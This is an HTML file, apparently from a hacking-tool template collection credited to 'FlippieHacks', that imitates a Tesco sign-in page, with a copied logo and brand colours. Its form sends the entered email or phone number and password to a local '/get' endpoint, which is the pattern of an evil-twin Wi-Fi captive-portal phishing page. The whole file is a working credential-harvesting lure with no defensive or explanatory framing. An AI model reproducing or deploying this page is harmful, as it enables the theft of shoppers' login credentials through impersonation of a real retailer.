<!--By FlippieHacks
https://github.com/FlippieHacks/ -->
<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #af1634;
  margin-right: 100px
}


.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #e62432;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #e62432;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #02549f;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #02549f;
  border: none;
  color: #E62432;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  font-weight: bold;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #af1634;
}
  .forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
  <svg id="svg" version="1.1" xmlns="http://www.w3.org/2000/svg" style="display: block;" viewBox="0 0 423 119"><path d="M0 0 C139.59 0 279.18 0 423 0 C423 39.27 423 78.54 423 119 C283.41 119 143.82 119 0 119 C0 79.73 0 40.46 0 0 Z " transform="translate(0,0)" style="fill: #FEFCFC;"/><path d="M0 0 C7.85107707 6.57101016 12.52575638 15.09173758 13.44140625 25.265625 C13.80384026 36.81674758 11.61184865 45.83245857 4.08984375 54.75390625 C-6.02026592 65.02481289 -20.32878504 68.93783834 -34.375 69.0625 C-47.99433754 69.10002266 -62.03616011 65.52751453 -72.1875 56 C-80.44223296 47.16159905 -83.4532875 37.61077996 -83.2421875 25.63671875 C-82.22721615 14.89313902 -76.80690013 6.82439741 -68.875 -0.25 C-49.39297787 -14.71624249 -19.55410693 -14.16440351 0 0 Z " transform="translate(407.875,10.25)" style="fill: #E62432;"/><path d="M0 0 C0 5.94 0 11.88 0 18 C-6.5625 14.625 -6.5625 14.625 -8.58422852 13.57275391 C-16.06260514 9.78271832 -22.81007175 8.65679495 -31.125 8.6875 C-32.00542969 8.67138672 -32.88585937 8.65527344 -33.79296875 8.63867188 C-38.59512917 8.63505034 -42.22781078 8.66218408 -46 12 C-46.89592083 15.59919423 -46.89592083 15.59919423 -47 19 C-42.68416522 22.19910432 -39.45062904 23.63230183 -34.0625 24.5625 C-33.09558228 24.73954468 -33.09558228 24.73954468 -32.10913086 24.92016602 C-30.07475567 25.29253923 -28.03794358 25.6477269 -26 26 C-4.25957078 29.80143343 -4.25957078 29.80143343 3 40 C5.59174178 45.18348357 4.68164479 53.98326122 3.421875 59.55859375 C0.54289543 66.27185065 -5.33342041 69.27139293 -11.66796875 72.2578125 C-27.11069655 78.09218522 -46.29004715 76.05298192 -62 72 C-63.32 71.34 -64.64 70.68 -66 70 C-66 64.72 -66 59.44 -66 54 C-60.78572876 55.73809041 -55.84582281 57.71750345 -50.8046875 59.87890625 C-44.89577349 62.24082592 -39.43209498 62.25082697 -33.125 62.3125 C-32.14402344 62.34150391 -31.16304687 62.37050781 -30.15234375 62.40039062 C-24.12641797 62.45324962 -20.53043301 62.12128061 -16 58 C-14.58857248 55.1154892 -14.58857248 55.1154892 -15 52 C-17.1434746 48.45502277 -18.77115595 47.39600032 -22.703125 46.12890625 C-27.36104751 45.0217892 -32.04196523 44.16215957 -36.76171875 43.36328125 C-47.26845031 41.4951779 -57.56120209 39.13243373 -64 30 C-66.49147997 24.51874406 -67.1101631 18.64957809 -65.34765625 12.85546875 C-62.54057331 6.55459158 -57.99533193 2.99688795 -52.375 -0.75 C-35.66449789 -6.93907486 -16.80254555 -4.20063639 0 0 Z " transform="translate(235,4)" style="fill: #E62432;"/><path d="M0 0 C19.14 0 38.28 0 58 0 C58 5.94 58 11.88 58 18 C56.55625 17.38125 55.1125 16.7625 53.625 16.125 C43.2365469 12.0189494 33.05235824 11.56198432 22 11 C22 17.6 22 24.2 22 31 C25.7434375 30.7834375 25.7434375 30.7834375 29.5625 30.5625 C30.33408447 30.51939697 31.10566895 30.47629395 31.90063477 30.43188477 C32.53283936 30.39377686 33.16504395 30.35566895 33.81640625 30.31640625 C34.45006104 30.27974854 35.08371582 30.24309082 35.73657227 30.20532227 C38.83767735 29.92401179 41.91745745 29.44036322 45 29 C45 33.95 45 38.9 45 44 C42.03 43.505 42.03 43.505 39 43 C37.56723057 42.86876943 36.13199797 42.76095374 34.6953125 42.68359375 C34.02000488 42.64548584 33.34469727 42.60737793 32.64892578 42.56811523 C31.81603027 42.52501221 30.98313477 42.48190918 30.125 42.4375 C27.44375 42.293125 24.7625 42.14875 22 42 C22 49.26 22 56.52 22 64 C36.0257594 63.49547628 47.95542395 62.59053259 61 57 C61 62.94 61 68.88 61 75 C40.87 75 20.74 75 0 75 C0.66 73.02 1.32 71.04 2 69 C2.29867753 65.84572157 2.29867753 65.84572157 2.25878906 62.52319336 C2.26509338 61.25845688 2.27139771 59.9937204 2.27789307 58.69065857 C2.27431332 57.32371887 2.27021137 55.95678045 2.265625 54.58984375 C2.26697378 53.17550083 2.26891609 51.76115836 2.27142334 50.34681702 C2.27436362 47.39059002 2.27011176 44.43448432 2.26074219 41.47827148 C2.24933773 37.69657477 2.2559202 33.91516167 2.26788712 30.1334753 C2.27512649 27.21576311 2.27280844 24.29811777 2.26763153 21.38040352 C2.26630132 19.98620126 2.26792065 18.59199285 2.27259064 17.19779778 C2.27769096 15.24767046 2.26853405 13.29752174 2.25878906 11.34741211 C2.25719788 10.23965927 2.25560669 9.13190643 2.25396729 7.99058533 C2.10983218 4.57013873 2.10983218 4.57013873 0 0 Z " transform="translate(99,2)" style="fill: #E5202F;"/><path d="M0 0 C0 6.27 0 12.54 0 19 C-2.1484375 17.50260417 -4.296875 16.00520833 -6.4453125 14.5078125 C-11.98844416 11.23617822 -17.08489853 10.61109 -23.375 10.625 C-24.12942383 10.62661133 -24.88384766 10.62822266 -25.66113281 10.62988281 C-31.4466561 10.75778125 -35.16233496 11.65084728 -40 15 C-40.886875 15.53625 -41.77375 16.0725 -42.6875 16.625 C-48.69254508 22.79234359 -50.49679013 29.20044703 -50.5625 37.625 C-50.42837133 45.74949142 -48.98311167 50.5458707 -43.625 56.75 C-35.09614775 64.06044478 -27.79640534 64.65673162 -17.02001953 64.18798828 C-10.29018373 63.56169223 -5.48666639 59.6577776 0 56 C0 62.27 0 68.54 0 75 C-19.58420564 78.77526856 -39.88652508 79.16411907 -57.5625 68.6953125 C-64.28901921 64.01693215 -69.03319627 58.65123066 -72 51 C-72.4125 49.948125 -72.825 48.89625 -73.25 47.8125 C-75.18657705 37.96823335 -74.89434721 27.67255753 -69.74609375 18.8515625 C-61.62758948 7.30426216 -50.44229768 1.3649069 -36.78515625 -1.5 C-24.47014958 -3.12675011 -12.15999066 -2.3161887 0 0 Z " transform="translate(320,2)" style="fill: #E62533;"/><path d="M0 0 C28.05 0 56.1 0 85 0 C85 5.61 85 11.22 85 17 C83.55625 16.54625 82.1125 16.0925 80.625 15.625 C73.34365395 13.45695876 66.26007172 12.03964799 58.6796875 11.4453125 C57.07843018 11.31793701 57.07843018 11.31793701 55.44482422 11.18798828 C54.63803223 11.12595215 53.83124023 11.06391602 53 11 C53.10768778 18.60637648 53.22035838 26.21266542 53.33933926 33.81887341 C53.39443507 37.35097936 53.44783313 40.88309378 53.49731445 44.4152832 C53.55431367 48.47876668 53.61876325 52.54210262 53.68359375 56.60546875 C53.70030624 57.8702153 53.71701874 59.13496185 53.73423767 60.43803406 C53.7641555 62.20930412 53.7641555 62.20930412 53.79467773 64.01635742 C53.81799416 65.57189583 53.81799416 65.57189583 53.84178162 67.15885925 C53.95424329 70.38347451 53.95424329 70.38347451 55 75 C46.75 75 38.5 75 30 75 C30.66 73.02 31.32 71.04 32 69 C32.32077383 66.05458482 32.32077383 66.05458482 32.31884766 62.99462891 C32.33871735 61.83387848 32.35858704 60.67312805 32.37905884 59.47720337 C32.39061005 58.23949188 32.40216125 57.0017804 32.4140625 55.7265625 C32.43342865 54.44768158 32.4527948 53.16880066 32.4727478 51.85116577 C32.52228279 48.46792838 32.56360235 45.08479618 32.60089111 41.70141602 C32.64105483 38.24225227 32.69209044 34.78325037 32.7421875 31.32421875 C32.83810704 24.54958356 32.9231921 17.77487737 33 11 C29.80355066 11.27861496 26.60879249 11.57345934 23.4140625 11.87109375 C22.06646851 11.98825745 22.06646851 11.98825745 20.69165039 12.10778809 C13.19358375 12.81919587 6.74306665 14.62846668 0 18 C0 12.06 0 6.12 0 0 Z " transform="translate(5,2)" style="fill: #E62231;"/><path d="M0 0 C7.12848531 4.50633322 11.33508846 11.3470034 13.375 19.4375 C14.46390018 28.80938246 13.021579 36.8387046 7.75 44.6875 C3.16428892 50.25268335 -1.25647888 53.02112758 -8.48046875 53.9140625 C-15.16964116 54.27705908 -21.5313512 54.2891729 -27.01953125 49.98828125 C-33.55069504 43.67959019 -37.91886075 37.62612477 -38.14453125 28.28466797 C-38.13808594 27.57197754 -38.13164062 26.85928711 -38.125 26.125 C-38.11855469 25.37879395 -38.11210937 24.63258789 -38.10546875 23.86376953 C-37.85725787 16.33742792 -35.8820603 10.88159941 -30.65234375 5.3515625 C-22.44051911 -2.16954792 -10.62056411 -4.81438023 0 0 Z " transform="translate(385.625,13.5625)" style="fill: #FEFCFC;"/><path d="M0 0 C1.81631676 0.00424484 1.81631676 0.00424484 3.66932678 0.00857544 C7.52053893 0.0197322 11.37151489 0.04482895 15.22265625 0.0703125 C17.84049142 0.0803481 20.45833026 0.08947294 23.07617188 0.09765625 C29.47924667 0.11965683 35.88218458 0.15308974 42.28515625 0.1953125 C41.49979492 0.82074951 40.71443359 1.44618652 39.90527344 2.09057617 C37.72188417 3.84448959 35.62066879 5.64065491 33.53515625 7.5078125 C30.64064486 10.04255412 27.71872151 12.53110659 24.72265625 14.9453125 C23.69978516 15.77289063 23.69978516 15.77289063 22.65625 16.6171875 C15.38509451 21.4566386 9.36031149 21.60418483 0.7890625 21.48828125 C-0.39961929 21.48403641 -1.58830109 21.47979156 -2.81300354 21.47541809 C-6.59301832 21.45868501 -10.3724913 21.4210414 -14.15234375 21.3828125 C-16.72199748 21.36775878 -19.29165961 21.35407158 -21.86132812 21.34179688 C-28.1460168 21.30879898 -34.43039156 21.25865254 -40.71484375 21.1953125 C-39.55359985 20.0362439 -39.55359985 20.0362439 -38.36889648 18.85375977 C-36.65152377 17.13354346 -34.94445701 15.40294959 -33.25 13.66015625 C-22.50577989 2.67830726 -15.31525885 -0.1354777 0 0 Z " transform="translate(378.71484375,97.8046875)" style="fill: #04549F;"/><path d="M0 0 C1.65125885 0.0001133 1.65125885 0.0001133 3.33587646 0.00022888 C4.51828918 0.00539017 5.7007019 0.01055145 6.91894531 0.01586914 C8.13406799 0.01728409 9.34919067 0.01869904 10.60113525 0.02015686 C14.48313862 0.02575551 18.36508437 0.0383078 22.24707031 0.05102539 C24.8785799 0.05604056 27.51009038 0.06060344 30.14160156 0.06469727 C36.59344415 0.0757245 43.04525311 0.09246131 49.49707031 0.11352539 C48.71098389 0.7396875 47.92489746 1.36584961 47.11499023 2.01098633 C44.95534146 3.7454725 42.8738379 5.51867019 40.80957031 7.36352539 C39.37375979 8.61546564 37.93613715 9.86532954 36.49707031 11.11352539 C35.68625 11.82637695 34.87542969 12.53922852 34.04003906 13.27368164 C33.20085937 13.98395508 32.36167969 14.69422852 31.49707031 15.42602539 C30.73394531 16.0821582 29.97082031 16.73829102 29.18457031 17.41430664 C22.20577973 21.82676871 14.31183963 21.38390216 6.34082031 21.30883789 C5.19794556 21.306008 4.0550708 21.3031781 2.87756348 21.30026245 C-0.74937701 21.28912564 -4.37606465 21.2640328 -8.00292969 21.23852539 C-10.4716761 21.2284872 -12.94042642 21.21936282 -15.40917969 21.21118164 C-21.44051501 21.18920759 -27.47170428 21.15579496 -33.50292969 21.11352539 C-30.74368628 18.33846323 -28.01458712 15.61376929 -25.00292969 13.11352539 C-22.85357663 11.30695709 -20.94854918 9.53142585 -19.00292969 7.48852539 C-13.37259768 2.13970998 -7.6954268 -0.01765006 0 0 Z " transform="translate(287.5029296875,97.886474609375)" style="fill: #03539F;"/><path d="M0 0 C1.81419434 0.00636726 1.81419434 0.00636726 3.66503906 0.01286316 C7.50609134 0.02957837 11.34660784 0.0672186 15.1875 0.10546875 C17.80077364 0.12052478 20.41405555 0.13421158 23.02734375 0.14648438 C29.41424352 0.17945853 35.80083347 0.22958691 42.1875 0.29296875 C41.41188721 0.90865723 40.63627441 1.5243457 39.8371582 2.15869141 C37.25260023 4.24053106 34.81582769 6.42035683 32.375 8.66796875 C29.30688438 11.43109365 26.23761438 14.16683246 23 16.73046875 C22.42894531 17.18292969 21.85789063 17.63539062 21.26953125 18.1015625 C14.53388705 21.955918 7.4461287 21.55754042 -0.08984375 21.48828125 C-1.2563295 21.48545135 -2.42281525 21.48262146 -3.62464905 21.47970581 C-7.33320576 21.46855263 -11.04151685 21.44345661 -14.75 21.41796875 C-17.27148088 21.40793268 -19.79296555 21.39880793 -22.31445312 21.390625 C-28.4805519 21.36862919 -34.64650839 21.33519993 -40.8125 21.29296875 C-37.55042651 18.0149247 -34.25288542 14.82144002 -30.8125 11.73046875 C-29.575 10.61478516 -29.575 10.61478516 -28.3125 9.4765625 C-27.4875 8.75597656 -26.6625 8.03539063 -25.8125 7.29296875 C-25.049375 6.60332031 -24.28625 5.91367188 -23.5 5.203125 C-16.02143248 -0.11231035 -8.87462411 -0.1182796 0 0 Z " transform="translate(126.8125,97.70703125)" style="fill: #03539E;"/><path d="M0 0 C1.81419434 0.00636726 1.81419434 0.00636726 3.66503906 0.01286316 C7.50609134 0.02957837 11.34660784 0.0672186 15.1875 0.10546875 C17.80077364 0.12052478 20.41405555 0.13421158 23.02734375 0.14648438 C29.41424352 0.17945853 35.80083347 0.22958691 42.1875 0.29296875 C41.41188721 0.90865723 40.63627441 1.5243457 39.8371582 2.15869141 C37.25260023 4.24053106 34.81582769 6.42035683 32.375 8.66796875 C29.30688438 11.43109365 26.23761438 14.16683246 23 16.73046875 C22.42894531 17.18292969 21.85789063 17.63539062 21.26953125 18.1015625 C14.53388705 21.955918 7.4461287 21.55754042 -0.08984375 21.48828125 C-1.2563295 21.48545135 -2.42281525 21.48262146 -3.62464905 21.47970581 C-7.33320576 21.46855263 -11.04151685 21.44345661 -14.75 21.41796875 C-17.27148088 21.40793268 -19.79296555 21.39880793 -22.31445312 21.390625 C-28.4805519 21.36862919 -34.64650839 21.33519993 -40.8125 21.29296875 C-37.55042651 18.0149247 -34.25288542 14.82144002 -30.8125 11.73046875 C-29.575 10.61478516 -29.575 10.61478516 -28.3125 9.4765625 C-27.4875 8.75597656 -26.6625 8.03539063 -25.8125 7.29296875 C-25.049375 6.60332031 -24.28625 5.91367188 -23.5 5.203125 C-16.02143248 -0.11231035 -8.87462411 -0.1182796 0 0 Z " transform="translate(42.8125,97.70703125)" style="fill: #03539E;"/><path d="M0 0 C1.65125885 0.0001133 1.65125885 0.0001133 3.33587646 0.00022888 C4.51828918 0.00539017 5.7007019 0.01055145 6.91894531 0.01586914 C8.13406799 0.01728409 9.34919067 0.01869904 10.60113525 0.02015686 C14.48313862 0.02575551 18.36508437 0.0383078 22.24707031 0.05102539 C24.8785799 0.05604056 27.51009038 0.06060344 30.14160156 0.06469727 C36.59344415 0.0757245 43.04525311 0.09246131 49.49707031 0.11352539 C48.71098389 0.7396875 47.92489746 1.36584961 47.11499023 2.01098633 C44.95534146 3.7454725 42.8738379 5.51867019 40.80957031 7.36352539 C39.37375979 8.61546564 37.93613715 9.86532954 36.49707031 11.11352539 C35.68625 11.82637695 34.87542969 12.53922852 34.04003906 13.27368164 C33.20085937 13.98395508 32.36167969 14.69422852 31.49707031 15.42602539 C30.73394531 16.0821582 29.97082031 16.73829102 29.18457031 17.41430664 C22.20577973 21.82676871 14.31183963 21.38390216 6.34082031 21.30883789 C5.19794556 21.306008 4.0550708 21.3031781 2.87756348 21.30026245 C-0.74937701 21.28912564 -4.37606465 21.2640328 -8.00292969 21.23852539 C-10.4716761 21.2284872 -12.94042642 21.21936282 -15.40917969 21.21118164 C-21.44051501 21.18920759 -27.47170428 21.15579496 -33.50292969 21.11352539 C-29.93231695 17.53201977 -26.32845096 13.99815179 -22.62792969 10.55102539 C-22.13679687 10.08245117 -21.64566406 9.61387695 -21.13964844 9.13110352 C-14.81350622 3.2568286 -8.74696013 -0.02006184 0 0 Z " transform="translate(203.5029296875,97.886474609375)" style="fill: #03539E;"/></svg>


  
  </div>

  <div class="form-container">

    <center><h1>Sign in with your Tesco account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">CONNECT</button>
	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>
	  				<div class="error-message"></div>


    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Tesco App if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
